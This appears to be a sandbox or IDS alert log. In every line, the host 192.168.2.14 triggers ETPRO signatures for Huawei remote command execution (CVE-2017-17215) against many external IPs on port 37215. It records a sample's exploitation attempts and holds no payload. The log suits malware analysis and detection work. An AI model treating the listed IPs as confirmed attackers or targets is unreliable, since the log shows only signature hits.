                                                        06/13/24-21:32:54.724706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360437215192.168.2.1441.131.170.135
                                                        06/13/24-21:32:13.545514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629437215192.168.2.14197.175.139.103
                                                        06/13/24-21:31:59.174627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5871037215192.168.2.14156.199.116.168
                                                        06/13/24-21:33:00.889019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484837215192.168.2.14197.254.39.40
                                                        06/13/24-21:32:36.247564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381837215192.168.2.1441.206.187.68
                                                        06/13/24-21:32:09.440167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5716837215192.168.2.1441.246.1.42
                                                        06/13/24-21:32:58.841622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5367237215192.168.2.14197.135.179.49
                                                        06/13/24-21:33:04.991222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4829637215192.168.2.1441.77.147.215
                                                        06/13/24-21:32:30.100777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5309037215192.168.2.14197.0.91.254
                                                        06/13/24-21:33:13.213255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063437215192.168.2.14156.139.7.58
                                                        06/13/24-21:32:38.316812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3713637215192.168.2.14197.99.48.98
                                                        06/13/24-21:33:09.089389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4625437215192.168.2.1441.150.187.77
                                                        06/13/24-21:32:40.355657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200437215192.168.2.14197.232.154.152
                                                        06/13/24-21:32:50.631476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886637215192.168.2.14197.75.138.60
                                                        06/13/24-21:32:03.279195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140637215192.168.2.14197.100.45.9
                                                        06/13/24-21:32:09.437328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937837215192.168.2.1441.247.11.66
                                                        06/13/24-21:32:23.932798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291037215192.168.2.1441.62.76.150
                                                        06/13/24-21:32:54.726881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5173237215192.168.2.14156.201.20.168
                                                        06/13/24-21:32:46.503612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351037215192.168.2.14156.116.8.20
                                                        06/13/24-21:31:59.174438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709237215192.168.2.14197.59.241.93
                                                        06/13/24-21:32:38.301142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4999437215192.168.2.1441.42.140.64
                                                        06/13/24-21:32:38.317684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6068037215192.168.2.14197.200.206.43
                                                        06/13/24-21:32:19.731143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3500437215192.168.2.1441.247.155.103
                                                        06/13/24-21:32:32.168230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5091437215192.168.2.14197.100.99.69
                                                        06/13/24-21:33:15.251564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660037215192.168.2.14156.219.234.135
                                                        06/13/24-21:33:11.157456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4208037215192.168.2.1441.110.144.50
                                                        06/13/24-21:32:05.346323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786637215192.168.2.14156.106.171.175
                                                        06/13/24-21:32:30.128236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4235837215192.168.2.14197.177.184.182
                                                        06/13/24-21:32:44.451618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177637215192.168.2.14156.4.144.73
                                                        06/13/24-21:32:58.820328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133437215192.168.2.14156.105.0.95
                                                        06/13/24-21:32:44.477331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331237215192.168.2.14197.108.235.230
                                                        06/13/24-21:32:19.754794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5525437215192.168.2.14156.213.212.104
                                                        06/13/24-21:32:15.638175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384637215192.168.2.14156.81.183.120
                                                        06/13/24-21:32:34.199352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024637215192.168.2.14156.98.38.34
                                                        06/13/24-21:32:46.509552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3558837215192.168.2.14197.181.149.95
                                                        06/13/24-21:32:25.971354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605637215192.168.2.14156.174.54.100
                                                        06/13/24-21:32:50.629584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3581237215192.168.2.1441.166.45.28
                                                        06/13/24-21:32:56.788962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6086437215192.168.2.1441.137.204.23
                                                        06/13/24-21:31:59.175657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575237215192.168.2.14197.209.113.82
                                                        06/13/24-21:32:25.991349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586237215192.168.2.1441.131.200.72
                                                        06/13/24-21:32:48.572726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5872437215192.168.2.1441.176.167.214
                                                        06/13/24-21:33:05.016178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4416237215192.168.2.1441.191.217.18
                                                        06/13/24-21:32:30.125786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5096437215192.168.2.14156.209.87.51
                                                        06/13/24-21:32:56.788674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4048837215192.168.2.14156.175.105.29
                                                        06/13/24-21:33:09.089977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3596837215192.168.2.1441.236.109.163
                                                        06/13/24-21:32:36.242927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4499637215192.168.2.14156.54.178.96
                                                        06/13/24-21:32:07.402269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5367837215192.168.2.14197.227.251.128
                                                        06/13/24-21:32:54.724952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442637215192.168.2.14197.95.61.6
                                                        06/13/24-21:32:17.672004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4869037215192.168.2.14156.25.83.247
                                                        06/13/24-21:32:23.837060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5407637215192.168.2.1441.154.140.203
                                                        06/13/24-21:32:42.417559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3534437215192.168.2.1441.86.243.45
                                                        06/13/24-21:33:11.158531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5748437215192.168.2.14156.52.172.209
                                                        06/13/24-21:33:09.107290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201037215192.168.2.14197.139.115.203
                                                        06/13/24-21:32:13.569406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917237215192.168.2.1441.201.181.199
                                                        06/13/24-21:32:21.782554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561037215192.168.2.1441.5.250.34
                                                        06/13/24-21:33:11.158967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032637215192.168.2.14156.64.47.243
                                                        06/13/24-21:32:28.028977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6043837215192.168.2.14197.215.150.249
                                                        06/13/24-21:32:01.221980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260437215192.168.2.14197.214.46.171
                                                        06/13/24-21:32:23.834397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5835237215192.168.2.1441.112.157.149
                                                        06/13/24-21:32:13.547297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559837215192.168.2.14156.217.140.245
                                                        06/13/24-21:32:44.480605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5645437215192.168.2.1441.134.238.30
                                                        06/13/24-21:32:07.416361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437837215192.168.2.1441.30.100.209
                                                        06/13/24-21:32:58.820399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3692037215192.168.2.1441.223.218.250
                                                        06/13/24-21:32:01.242012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5896237215192.168.2.14197.49.121.243
                                                        06/13/24-21:32:40.357878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093437215192.168.2.1441.18.214.61
                                                        06/13/24-21:32:09.440651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4673437215192.168.2.14156.194.232.216
                                                        06/13/24-21:32:50.610282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691237215192.168.2.14156.33.46.225
                                                        06/13/24-21:32:44.475461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578237215192.168.2.1441.144.252.114
                                                        06/13/24-21:32:44.457978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5976437215192.168.2.1441.231.164.167
                                                        06/13/24-21:32:28.028599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344837215192.168.2.1441.41.70.203
                                                        06/13/24-21:32:40.377746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5318237215192.168.2.14156.16.53.124
                                                        06/13/24-21:33:13.212350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006237215192.168.2.1441.159.4.176
                                                        06/13/24-21:32:19.731468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4356637215192.168.2.14156.95.194.185
                                                        06/13/24-21:32:42.422635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299837215192.168.2.14197.210.99.31
                                                        06/13/24-21:32:56.755515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6061437215192.168.2.14197.90.176.238
                                                        06/13/24-21:33:13.228511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673637215192.168.2.14156.92.181.168
                                                        06/13/24-21:32:07.402942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4992637215192.168.2.1441.10.47.182
                                                        06/13/24-21:32:40.379403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909637215192.168.2.14197.125.140.50
                                                        06/13/24-21:32:25.972151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536837215192.168.2.14197.129.147.175
                                                        06/13/24-21:33:00.889053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5768237215192.168.2.14156.162.115.188
                                                        06/13/24-21:32:42.422004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3395837215192.168.2.14156.133.123.168
                                                        06/13/24-21:32:58.824616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625837215192.168.2.14156.236.155.18
                                                        06/13/24-21:32:58.820543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3870037215192.168.2.1441.142.251.244
                                                        06/13/24-21:32:17.677478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4126437215192.168.2.1441.121.165.110
                                                        06/13/24-21:32:58.822267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4645437215192.168.2.1441.21.68.223
                                                        06/13/24-21:32:42.403226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3299037215192.168.2.14197.134.252.43
                                                        06/13/24-21:31:59.176913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5007837215192.168.2.14156.72.43.213
                                                        06/13/24-21:32:23.832552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5088637215192.168.2.14197.60.252.147
                                                        06/13/24-21:31:57.153921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574437215192.168.2.14156.142.178.67
                                                        06/13/24-21:32:32.169182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5052037215192.168.2.14156.128.200.9
                                                        06/13/24-21:32:34.190991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198637215192.168.2.14197.182.159.84
                                                        06/13/24-21:33:13.231623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4259037215192.168.2.1441.58.239.55
                                                        06/13/24-21:32:48.549510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5960237215192.168.2.14156.158.122.49
                                                        06/13/24-21:32:34.191342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3927437215192.168.2.14197.141.183.48
                                                        06/13/24-21:32:38.296015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5252637215192.168.2.14156.26.215.185
                                                        06/13/24-21:32:32.153539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4160037215192.168.2.14197.94.214.154
                                                        06/13/24-21:32:50.613304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4774637215192.168.2.14197.48.175.206
                                                        06/13/24-21:32:09.458730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4880237215192.168.2.1441.180.2.179
                                                        06/13/24-21:32:36.268018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5347037215192.168.2.14197.130.145.195
                                                        06/13/24-21:33:00.884351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5479237215192.168.2.1441.146.179.177
                                                        06/13/24-21:32:09.439544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3726437215192.168.2.14156.39.135.58
                                                        06/13/24-21:32:38.318247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3651037215192.168.2.14156.25.164.160
                                                        06/13/24-21:32:03.277085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4107037215192.168.2.1441.34.96.28
                                                        06/13/24-21:32:07.404176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994637215192.168.2.14156.227.82.247
                                                        06/13/24-21:33:09.109779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4848437215192.168.2.14156.199.80.117
                                                        06/13/24-21:32:30.123693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3595637215192.168.2.14156.163.83.36
                                                        06/13/24-21:33:17.307603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093637215192.168.2.1441.186.214.245
                                                        06/13/24-21:32:34.213420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5120037215192.168.2.14156.255.21.66
                                                        06/13/24-21:32:36.246797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918437215192.168.2.14197.124.118.248
                                                        06/13/24-21:32:38.305507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4004237215192.168.2.14156.200.28.245
                                                        06/13/24-21:32:21.805437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379837215192.168.2.1441.0.253.123
                                                        06/13/24-21:32:36.268500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629837215192.168.2.14197.199.52.76
                                                        06/13/24-21:33:11.176865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4103437215192.168.2.14156.156.164.219
                                                        06/13/24-21:32:34.216868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867237215192.168.2.14156.198.87.157
                                                        06/13/24-21:32:50.611838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357237215192.168.2.14156.83.132.93
                                                        06/13/24-21:32:15.634588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5312837215192.168.2.14197.240.191.7
                                                        06/13/24-21:32:48.550025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313437215192.168.2.1441.125.23.190
                                                        06/13/24-21:32:09.438592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351037215192.168.2.14156.71.10.215
                                                        06/13/24-21:32:36.269043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4729237215192.168.2.14156.84.235.245
                                                        06/13/24-21:32:58.820444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5456637215192.168.2.14197.121.42.160
                                                        06/13/24-21:33:11.180808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110037215192.168.2.14197.184.207.219
                                                        06/13/24-21:32:03.307530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4129237215192.168.2.1441.49.85.198
                                                        06/13/24-21:32:11.508020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4486637215192.168.2.14197.115.239.48
                                                        06/13/24-21:32:50.611791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5280437215192.168.2.1441.129.45.97
                                                        06/13/24-21:32:11.508913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3526637215192.168.2.14197.150.93.34
                                                        06/13/24-21:32:15.609409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3441437215192.168.2.1441.0.62.123
                                                        06/13/24-21:32:34.215015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283037215192.168.2.14156.212.10.189
                                                        06/13/24-21:33:05.011931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5729237215192.168.2.1441.228.24.150
                                                        06/13/24-21:33:11.154164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3332637215192.168.2.14197.169.227.97
                                                        06/13/24-21:33:11.154620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3879037215192.168.2.14156.223.203.100
                                                        06/13/24-21:32:03.299353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5596637215192.168.2.1441.193.199.134
                                                        06/13/24-21:32:32.166995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4076837215192.168.2.1441.29.203.153
                                                        06/13/24-21:32:03.294752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4329637215192.168.2.14197.213.58.236
                                                        06/13/24-21:32:46.508655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5231437215192.168.2.1441.237.116.22
                                                        06/13/24-21:32:36.267569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025437215192.168.2.1441.85.126.126
                                                        06/13/24-21:32:25.969038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5271637215192.168.2.14156.206.60.21
                                                        06/13/24-21:32:32.152146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3302237215192.168.2.1441.104.64.174
                                                        06/13/24-21:33:15.272793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4895437215192.168.2.14197.156.13.110
                                                        06/13/24-21:32:13.544831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5189837215192.168.2.1441.214.5.141
                                                        06/13/24-21:33:02.913936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4508237215192.168.2.1441.218.240.176
                                                        06/13/24-21:33:11.177562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5624437215192.168.2.14197.219.197.147
                                                        06/13/24-21:32:15.610924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4096837215192.168.2.14197.116.53.23
                                                        06/13/24-21:32:25.992916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4367437215192.168.2.14197.109.5.102
                                                        06/13/24-21:32:34.213056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4653037215192.168.2.1441.21.243.102
                                                        06/13/24-21:32:44.476354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5072837215192.168.2.14156.41.186.23
                                                        06/13/24-21:32:11.508004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5298237215192.168.2.1441.41.204.237
                                                        06/13/24-21:32:11.485998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515637215192.168.2.1441.64.227.161
                                                        06/13/24-21:32:25.975002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3629837215192.168.2.14156.146.190.125
                                                        06/13/24-21:32:32.156694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3980037215192.168.2.14156.96.115.33
                                                        06/13/24-21:32:11.510104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5565637215192.168.2.14156.194.11.210
                                                        06/13/24-21:32:56.756960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3351437215192.168.2.1441.180.220.40
                                                        06/13/24-21:32:34.195008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4868437215192.168.2.14156.11.109.226
                                                        06/13/24-21:32:21.786793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4027837215192.168.2.1441.82.24.216
                                                        06/13/24-21:32:52.656769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5345437215192.168.2.14197.157.121.64
                                                        06/13/24-21:32:15.635144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5824237215192.168.2.14156.54.48.243
                                                        06/13/24-21:33:00.888421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5381237215192.168.2.14156.124.169.173
                                                        06/13/24-21:32:15.630254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4075437215192.168.2.1441.138.52.192
                                                        06/13/24-21:32:38.304491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200437215192.168.2.14197.116.126.115
                                                        06/13/24-21:31:59.176712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862837215192.168.2.14156.8.66.172
                                                        06/13/24-21:32:50.610938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5747037215192.168.2.1441.97.252.135
                                                        06/13/24-21:32:21.784100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3324837215192.168.2.14156.133.228.46
                                                        06/13/24-21:32:36.269746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4878237215192.168.2.14156.196.98.181
                                                        06/13/24-21:32:38.301062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536237215192.168.2.14197.254.215.170
                                                        06/13/24-21:32:44.474023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3614037215192.168.2.14197.113.25.153
                                                        06/13/24-21:32:54.708184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056237215192.168.2.14197.122.181.123
                                                        06/13/24-21:33:13.211355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155637215192.168.2.14197.251.165.111
                                                        06/13/24-21:32:46.527679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993637215192.168.2.14156.183.67.52
                                                        06/13/24-21:32:23.940520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5925037215192.168.2.1441.72.82.1
                                                        06/13/24-21:32:44.476805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965237215192.168.2.14156.118.139.58
                                                        06/13/24-21:32:28.045061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587437215192.168.2.14197.24.233.69
                                                        06/13/24-21:33:13.211475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5609237215192.168.2.14156.12.75.11
                                                        06/13/24-21:32:32.152605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4276037215192.168.2.14156.12.163.162
                                                        06/13/24-21:32:42.417793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437037215192.168.2.14156.142.163.104
                                                        06/13/24-21:32:30.078267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4507837215192.168.2.1441.183.82.8
                                                        06/13/24-21:32:46.509937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3898037215192.168.2.14156.223.121.246
                                                        06/13/24-21:33:09.089429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629437215192.168.2.14156.41.162.157
                                                        06/13/24-21:32:30.124137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433637215192.168.2.14156.94.71.67
                                                        06/13/24-21:31:57.093697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505037215192.168.2.14197.175.129.195
                                                        06/13/24-21:33:07.037871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131437215192.168.2.14197.55.39.184
                                                        06/13/24-21:32:23.942865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5254237215192.168.2.14156.57.158.120
                                                        06/13/24-21:33:00.885176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3910637215192.168.2.1441.175.191.23
                                                        06/13/24-21:32:19.730047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5925437215192.168.2.14156.49.29.42
                                                        06/13/24-21:31:59.197820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3692037215192.168.2.14156.77.39.5
                                                        06/13/24-21:32:09.460077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077037215192.168.2.14156.142.125.118
                                                        06/13/24-21:32:30.125507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492437215192.168.2.14197.82.45.60
                                                        06/13/24-21:33:17.309310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377437215192.168.2.14156.196.199.192
